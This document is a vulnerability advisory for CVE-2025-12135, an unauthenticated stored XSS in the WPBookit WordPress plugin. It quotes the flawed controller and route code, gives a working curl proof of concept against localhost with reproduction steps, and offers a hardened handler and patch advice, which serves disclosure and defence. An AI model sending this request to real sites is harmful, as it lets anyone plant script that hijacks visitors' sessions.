CVE-2025-12135

The WPBookit plugin neither checks user permissions nor sanitizes the custom CSS/JS code submitted to its save_custome_code AJAX endpoint, so an unauthenticated attacker can store arbitrary JavaScript that is printed on every page load, resulting in stored XSS and potential session hijacking.

TL;DR Exploits

# Basic XSS injection
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"

Details

The vulnerability exists in the save_custome_code method of the WPB_Setting_Controller class. The plugin registers its AJAX dispatcher for unauthenticated users as well (the wp_ajax_nopriv_ hook), the route is configured with 'nonce' => 0, and the handler performs no capability check or sanitization, so any visitor can store arbitrary CSS/JS that the shortcode class then prints on every page load.

Vulnerable code from /core/admin/classes/controllers/class.wpb-setting-controller.php:16-25:

public function save_custome_code(WP_REST_Request $request){
    // No current_user_can() check and no nonce verification: any caller reaches this point.
    $css_code = $request->get_param('css_code');
    $js_code  = $request->get_param('js_code');
    // Stored verbatim, without sanitization, as a site-wide option.
    update_option( 'wpb_custom_code_data', [ 'css_code' => $css_code, 'js_code' => $js_code ] );
}

Code execution from /core/shortcodes/class-wpbookit-shortcode-abstract.php:20-27:

$wpb_custom_code = get_option( 'wpb_custom_code_data', [ 'css_code' => '', 'js_code' => '' ] );

// The stored values are printed unescaped inside <style> and <script> tags on every page.
wp_add_inline_style( 'wpb-custom-code-css', stripslashes( $wpb_custom_code['css_code'] ) );
wp_add_inline_script( 'wpb-custom-code-js', stripslashes( $wpb_custom_code['js_code'] ) );

Unauthenticated access from /core/admin/classes/class.wpb-admin-routes-handler.php:15-16:

add_action( "wp_ajax_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );
// The nopriv hook makes the same dispatcher reachable by unauthenticated visitors.
add_action( "wp_ajax_nopriv_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );

Route configuration from /core/admin/classes/class.wpb-admin-routes.php:118-123:

'save_custome_code' => [
    'method' => 'post',
    'action' => 'WPB_Setting_Controller@save_custome_code',
    'nonce' => 0,   // nonce verification disabled for this route
    'module' => 'setting-controller'
],
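The following is an added example of a hardened handler, not code from the WPBookit plugin. It keeps the same option name and array shape so the render path shown above still works, and adds the three missing controls: a capability check (storing site-wide JavaScript is equivalent to the unfiltered_html capability), nonce verification (the route above ships with 'nonce' => 0), and a rejection of closing tags that would break out of the <style>/<script> context the values are printed into. The nonce action name 'wpb_custom_code', the request field '_wpnonce', and the WP_REST_Request argument the router is assumed to pass are assumptions, not taken from the page.

```php
<?php
/**
 * Added example (not WPBookit's code): a hardened replacement for
 * WPB_Setting_Controller::save_custome_code().
 *
 * Assumptions not taken from the page: the nonce action string
 * 'wpb_custom_code', the '_wpnonce' request field, and that the plugin's
 * router passes a WP_REST_Request object as the original signature suggests.
 */
class WPB_Setting_Controller {

    const NONCE_ACTION = 'wpb_custom_code'; // assumed name

    public function save_custome_code( WP_REST_Request $request ) {
        // Authorization: unauthenticated callers and non-admins are rejected here.
        // Site-wide JS on every page equals unfiltered_html, so require both.
        if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'unfiltered_html' ) ) {
            wp_send_json_error( [ 'message' => 'Insufficient permissions.' ], 403 ); // exits
        }

        // CSRF protection: the original route has 'nonce' => 0, so an admin could
        // otherwise be made to submit this request from a third-party page.
        $nonce = (string) $request->get_param( '_wpnonce' );
        if ( ! wp_verify_nonce( $nonce, self::NONCE_ACTION ) ) {
            wp_send_json_error( [ 'message' => 'Invalid or missing nonce.' ], 403 ); // exits
        }

        $css_code = (string) $request->get_param( 'css_code' );
        $js_code  = (string) $request->get_param( 'js_code' );

        // Both values are later printed inside <style> and <script> tags by
        // wp_add_inline_style()/wp_add_inline_script(). A closing tag inside the
        // value would escape that context, so reject such input outright.
        if ( self::contains_closing_tag( $css_code, 'style' )
            || self::contains_closing_tag( $js_code, 'script' ) ) {
            wp_send_json_error( [ 'message' => 'Closing HTML tags are not allowed in custom code.' ], 400 ); // exits
        }

        // Same option name and shape as the original, so the render path is unchanged.
        update_option( 'wpb_custom_code_data', [ 'css_code' => $css_code, 'js_code' => $js_code ] );
        wp_send_json_success();
    }

    /**
     * True if $value contains a "</tag" sequence, case-insensitively and allowing
     * whitespace around the slash (e.g. "< / style").
     */
    private static function contains_closing_tag( $value, $tag ) {
        return (bool) preg_match( '#<\s*/\s*' . preg_quote( $tag, '#' ) . '#i', $value );
    }
}
```

Two further points for whoever patches the plugin: the wp_ajax_nopriv_ registration should only dispatch routes that are genuinely public, and the route entry should be switched to 'nonce' => 1 if the router enforces that flag (how the router interprets it is not shown on the page, so that is an assumption). For an existing site, the stored value can be reviewed with `wp option get wpb_custom_code_data`; unexpected JavaScript there is the indicator of compromise for this issue.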

Manual Reproduction

  1. Identify a target with the WPBookit plugin installed.
  2. Inject malicious JavaScript:

     curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
       -H "Content-Type: application/x-www-form-urlencoded" \
       -d "css_code=/* malicious */&js_code=alert('XSS');"

  3. Verify the injection by visiting any page on the site - the alert will execute.
  4. Check persistence - the malicious code is stored in the database and executes on every page load.